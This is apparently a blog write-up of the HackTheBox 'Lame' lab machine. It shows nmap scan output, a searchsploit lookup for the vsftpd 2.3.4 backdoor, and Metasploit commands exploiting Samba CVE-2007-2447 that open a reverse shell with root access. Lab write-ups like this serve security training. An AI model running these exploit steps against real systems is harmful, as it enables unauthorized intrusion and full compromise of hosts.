HTB - Lame

HTB – Lame

In this walk through, we will be going through the Lame room from HackTheBox. This room is rated as easy on the platform and it consists of exploitation of a vulnerable Samba version to get root. So, let’s get started without any delay.

Lame

Machine Info:

TitleLame
IPaddress10.10.10.3
DifficultyEasy
OSLinux
DescriptionLame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Enumeration:

  • I started off with an nmap scan on the target IP with aggressive flag set and found 4 ports opened – 21 (FTP), 22 (SSH), 139 and 445 (Samba).

$ sudo nmap -A 10.10.10.3

Nmap scan report for 10.10.10.3
Host is up (0.25s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| vulners: 
|   cpe:/a:vsftpd:vsftpd:2.3.4: 
|     	PRION:CVE-2011-2523	10.0	https://vulners.com/prion/PRION:CVE-2011-2523
|     	EDB-ID:49757	10.0	https://vulners.com/exploitdb/EDB-ID:49757	*EXPLOIT*
|_    	1337DAY-ID-36095	10.0	https://vulners.com/zdt/1337DAY-ID-36095*EXPLOIT*
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	SSV:78173	7.8	https://vulners.com/seebug/SSV:78173	*EXPLOIT*
|     	SSV:69983	7.8	https://vulners.com/seebug/SSV:69983	*EXPLOIT*
|     	EDB-ID:24450	7.8	https://vulners.com/exploitdb/EDB-ID:24450	*EXPLOIT*
|     	EDB-ID:15215	7.8	https://vulners.com/exploitdb/EDB-ID:15215	*EXPLOIT*
|     	SECURITYVULNS:VULN:8166	7.5	https://vulners.com/securityvulns/SECURITYVULNS:VULN:8166
|     	PRION:CVE-2010-4478	7.5	https://vulners.com/prion/PRION:CVE-2010-4478
|     	SSV:20512	7.2	https://vulners.com/seebug/SSV:20512	*EXPLOIT*
|     	PRION:CVE-2011-1013	7.2	https://vulners.com/prion/PRION:CVE-2011-1013
|     	PRION:CVE-2008-1657	6.5	https://vulners.com/prion/PRION:CVE-2008-1657
|     	CVE-2008-1657	6.5	https://vulners.com/cve/CVE-2008-1657
|     	SSV:60656	5.0	https://vulners.com/seebug/SSV:60656	*EXPLOIT*
|     	PRION:CVE-2011-2168	5.0	https://vulners.com/prion/PRION:CVE-2011-2168
|     	PRION:CVE-2010-5107	5.0	https://vulners.com/prion/PRION:CVE-2010-5107
|     	CVE-2010-5107	5.0	https://vulners.com/cve/CVE-2010-5107
|     	PRION:CVE-2010-4755	4.0	https://vulners.com/prion/PRION:CVE-2010-4755
|     	PRION:CVE-2010-4754	4.0	https://vulners.com/prion/PRION:CVE-2010-4754
|     	PRION:CVE-2012-0814	3.5	https://vulners.com/prion/PRION:CVE-2012-0814
|     	PRION:CVE-2011-5000	3.5	https://vulners.com/prion/PRION:CVE-2011-5000
|     	CVE-2011-5000	3.5	https://vulners.com/cve/CVE-2011-5000
|     	CVE-2008-5161	2.6	https://vulners.com/cve/CVE-2008-5161
|     	PRION:CVE-2011-4327	2.1	https://vulners.com/prion/PRION:CVE-2011-4327
|     	CVE-2011-4327	2.1	https://vulners.com/cve/CVE-2011-4327
|     	PRION:CVE-2008-3259	1.2	https://vulners.com/prion/PRION:CVE-2008-3259
|     	CVE-2008-3259	1.2	https://vulners.com/cve/CVE-2008-3259
|_    	SECURITYVULNS:VULN:9455	0.0	https://vulners.com/securityvulns/SECURITYVULNS:VULN:9455
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%), LifeSize video conferencing system (Linux 2.4.21) (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   248.70 ms 10.10.14.1
2   250.07 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.65 seconds

nmap aggressive scan

nmap scan

  • Looked for the vsftpd version for known exploits using searchsploit and found the famous backdoor vulnerability which also have a metasploit module for it.

searchsploit vsftpd 2.3.4

searchsploit vsftpd 2.3.4

Exploitation:

  • Next, tried the exploit from metasploit on the target however it failed.

Exploit completed but no session created

  • Now, at this point, i fell into a rabbit hole and was enumerating very deep but didn’t found any low hanging fruit for the initial access. Checked the Samba version 3.0.20 and found out that it was vulnerable to CVE-2007-2447. Next, i used the exploit from metasploit for the concerned CVE and got a root shell.

$ msfconsole -q
[*] Starting persistent handler(s)...

msf6 > search  CVE-2007-2447

msf6 > use 0
msf6 exploit(multi/samba/usermap_script) > set LHOST  10.10.14.2 
LHOST => 10.10.14.2
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Command shell session 1 opened (10.10.14.2:4444 -> 10.10.10.3:35378) at 2023-12-01 12:56:19 +0530

id
uid=0(root) gid=0(root)

msfconsole -q

got root

Getting Flags:

  • Captured the user and root flag and completed the room.

capturing both the flags

machine completed

Also Read: HTB – Intentions

Conclusion:

Conclusion

So that was “Lame” for you. We started off with a regular nmap aggressive scan and found Samba version 3.0.20 running on the target. Checked metasploit for known exploit and found one. Fired it on the target and got root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top